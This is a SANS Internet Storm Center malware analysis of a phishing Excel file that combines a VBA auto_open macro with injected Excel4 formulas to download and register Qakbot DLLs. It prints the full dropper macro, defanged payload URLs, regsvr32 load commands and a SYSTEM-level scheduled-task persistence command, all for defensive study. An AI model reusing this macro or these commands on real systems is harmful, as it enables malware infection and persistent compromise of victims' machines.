Microsoft Excel supports two types of macros. The legacy format is known as “Excel4 macro” and the new (but already used for a while) is based on VBA. We already cover both formats in many diaries[1][2]. Yesterday, I spotted an interesting sample that implements… both!
The malicious file was delivered through a classic phishing email and is called “Document_195004540-Copy.xls” (SHA256:4f4e67dccb3dfc213fac91d34d53d83be9b9f97c0b75fbbce8a6d24f26549e14). The file is unknown on VT at this time. It looks like a classic trap:
The document contains some VBA code:
[email protected]:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls
1: 103 ‘x01CompObj’
2: 240 ‘x05DocumentSummaryInformation’
3: 208 ‘x05SummaryInformation’
4: 180804 ‘Workbook’
5: 597 ‘_VBA_PROJECT_CUR/PROJECT’
6: 116 ‘_VBA_PROJECT_CUR/PROJECTwm’
7: 97 ‘_VBA_PROJECT_CUR/UserForm1/x01CompObj’
8: 301 ‘_VBA_PROJECT_CUR/UserForm1/x03VBFrame’
9: 226 ‘_VBA_PROJECT_CUR/UserForm1/f’
10: 272 ‘_VBA_PROJECT_CUR/UserForm1/o’
11: M 3768 ‘_VBA_PROJECT_CUR/VBA/Module1’
12: m 991 ‘_VBA_PROJECT_CUR/VBA/Sheet1’
13: M 3010 ‘_VBA_PROJECT_CUR/VBA/ThisWorkbook’
14: m 1195 ‘_VBA_PROJECT_CUR/VBA/UserForm1’
15: 3860 ‘_VBA_PROJECT_CUR/VBA/_VBA_PROJECT’
16: 2004 ‘_VBA_PROJECT_CUR/VBA/__SRP_0’
17: 138 ‘_VBA_PROJECT_CUR/VBA/__SRP_1’
18: 212 ‘_VBA_PROJECT_CUR/VBA/__SRP_2’
19: 206 ‘_VBA_PROJECT_CUR/VBA/__SRP_3’
20: 864 ‘_VBA_PROJECT_CUR/VBA/dir’
Here is the interesting macro (stream 11):
[email protected]:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls -s 11 -v
Attribute VB_Name = “Module1”
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = “Sheet3”
Sheets(“Sheet3”).Visible = False
Sheets(“Sheet3”).Range(“A1:M100”).Font.Color = vbWhite
Sheets(“Sheet3”).Range(“H24”) = UserForm1.Label1.Caption
Sheets(“Sheet3”).Range(“H25”) = UserForm1.Label3.Caption
Sheets(“Sheet3”).Range(“H26”) = UserForm1.Label4.Caption
Sheets(“Sheet3”).Range(“K17”) = “=NOW()”
Sheets(“Sheet3”).Range(“K18”) = “.dat”
Sheets(“Sheet3”).Range(“H35”) = “=HALT()”
Sheets(“Sheet3”).Range(“I9”) = UserForm1.Label2.Caption
Sheets(“Sheet3”).Range(“I10”) = UserForm1.Caption
Sheets(“Sheet3”).Range(“I11”) = “JJCCBB”
Sheets(“Sheet3”).Range(“I12”) = “Byukilos”
Sheets(“Sheet3”).Range(“G10”) = “..Xertis.dll”
Sheets(“Sheet3”).Range(“G11”) = “..Xertis1.dll”
Sheets(“Sheet3”).Range(“G12”) = “..Xertis2.dll”
Sheets(“Sheet3”).Range(“I17”) = “regsvr32 -silent ..Xertis.dll”
Sheets(“Sheet3”).Range(“I18”) = “regsvr32 -silent ..Xertis1.dll”
Sheets(“Sheet3”).Range(“I19”) = “regsvr32 -silent ..Xertis2.dll”
Sheets(“Sheet3”).Range(“H10”) = “=Byukilos(0,H24&K17&K18,G10,0,0)”
Sheets(“Sheet3”).Range(“H11”) = “=Byukilos(0,H25&K17&K18,G11,0,0)”
Sheets(“Sheet3”).Range(“H12”) = “=Byukilos(0,H26&K17&K18,G12,0,0)”
Sheets(“Sheet3”).Range(“H9”) = “=REGISTER(I9,I10&J10,I11,I12,,1,9)”
Sheets(“Sheet3”).Range(“H17”) = “=EXEC(I17)”
Sheets(“Sheet3”).Range(“H18”) = “=EXEC(I18)”
Sheets(“Sheet3”).Range(“H19”) = “=EXEC(I19)”
Application.Run Sheets(“Sheet3”).Range(“H1”)
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets(“Sheet3”).Delete
Application.DisplayAlerts = True
End Sub
First, the attacker wrote some “good” code because a new sheet (“Sheet3”) is created and, when the document is closed, the sheet is removed! (Via the auto_close() function).
The magic line is this one:
Set Fera = Excel4IntlMacroSheets
See the Microsoft documentation[3]. An Excel4 macro is injected into the created sheet and executed. What does it do?
It downloads the second stage payload from three different URLs (stored in a form):
hxxp://45[.]153[.]242[.]159/44461.9891568287.dat
hxxp://188[.]165[.]62[.]61/44461.9891568287.dat
hxxp://185[.]198[.]57[.]109/44461.9891568287.dat
The downloaded file is called Xertis.dll (SHA256:b8b8895cdf37dba76f9966ec100ac85cc0f70dfd79f09a175454b5062d21c25d) and again unknown on VT. This is a DLL that is loaded into the system via this command:
regsvr32 -silent ..Xertis.dll
Persistence is implemented via a scheduled task:
“C:Windowssystem32schtasks.exe” /Create /RU “NT AUTHORITYSYSTEM” /tn wxhfetombc /tr “regsvr32.exe -s “C:Usersuser01Xertis.dll”” /SC ONCE /Z /ST 23:45 /ET 23:57
Once I infected my lab, the following C2 traffic was generated:
It’s a Qakbot sample…
The VBA macro was not obfuscated but the idea of mixing VBA with Excel4 was pretty clever to defeat many hunting rules.
[1] https://isc.sans.edu/forums/diary/Maldoc+Excel+40+Macros/24750
[2] https://isc.sans.edu/forums/diary/VBA+Macro+Trying+to+Alter+the+Application+Menus/27068
[3] https://docs.microsoft.com/en-us/office/vba/api/excel.application.excel4intlmacrosheets
Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: Read More (SANS Internet Storm Center, InfoCON: green)